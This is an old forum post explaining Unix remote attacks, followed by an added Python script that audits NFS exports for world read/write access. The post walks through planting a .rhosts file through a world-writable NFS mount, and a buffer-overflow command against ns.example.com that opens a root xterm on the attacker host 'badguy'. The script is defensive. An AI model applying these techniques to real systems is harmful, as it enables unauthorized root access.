Dr4k3 Posted November 14, 2006

Unix Remote Attacks

What are remote hacks?

A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we're not really going to cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually exploiting an existing service running on the victim server (which is misconfigured or allows too much access) is the goal. Exporting an NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons running might be subject to buffer overflows remotely, allowing someone from a remote location to run arbitrary commands on the victim server.

Here are a couple of examples:

1. You are root on a host named badguy.
2. You discover the host victim is exporting /home2/old read/writable to the world.
3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.
4. Quickly, you create a fred account on badguy.
5. Now you mount /home2/old and create an .rhosts file to establish trust with badguy.
6. After you become fred on badguy, you rlogin to the victim as fred.

Here's another attack involving a buffer overflow:

1. This remote system is running named.
2. You have written a named exploit that allows you to send arbitrary commands through the named daemon. It does a buffer overflow trick; you compile it and name it sploit.
3. You type: sploit ns.example.com "/usr/X11R6/bin/xterm -display badguy.whatever:0"
4. A window appears on your terminal that is running as root on ns.example.com.
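Added example, not part of the original post: an audit check for the misconfiguration in the first scenario, an export that any host can mount read/write. It assumes Linux exports(5) syntax (the post names no operating system); the sample file and the function name are constructed for illustration.

```python
import re

# Constructed sample in Linux exports(5) syntax (an assumption; not from the post).
SAMPLE_EXPORTS = """\
/home2/old     *(rw,sync)
/srv/docs      (ro)
/home          trusted.example.com (rw)
/export/build  10.0.0.0/24(rw,root_squash)
/export/pub    *(ro,all_squash)
/export/tmp    build*.example.com(rw) \\
               0.0.0.0/0(rw)
"""

ANY_HOST = {"", "*", "0.0.0.0/0", "::/0"}
ENTRY = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")  # host, optional (options)


def world_writable_exports(text):
    """Return (path, entry, note) for every export any host may mount read/write.

    Not handled: quoted paths and '-option' default lists.
    """
    findings = []
    text = text.replace("\\\n", " ")           # join continuation lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()    # drop comments
        if not line:
            continue
        path, *entries = line.split()
        prev_bare_host = None
        for entry in entries:
            m = ENTRY.match(entry)
            if not m:
                continue
            host, opts = m.group(1), (m.group(2) or "").split(",")
            if host in ANY_HOST and "rw" in opts:
                note = "read/write for any host"
                if host == "" and prev_bare_host:
                    # "host (rw)": the space makes (rw) apply to everyone
                    note += f" (stray space after {prev_bare_host!r})"
                findings.append((path, entry, note))
            prev_bare_host = host if m.group(2) is None else None
    return findings


if __name__ == "__main__":
    for path, entry, note in world_writable_exports(SAMPLE_EXPORTS):
        print(f"{path}: {entry} -> {note}")
```

Note that root_squash does not change the outcome here: it only remaps UID 0, while the scenario relies on an ordinary user's UID being accepted from the client.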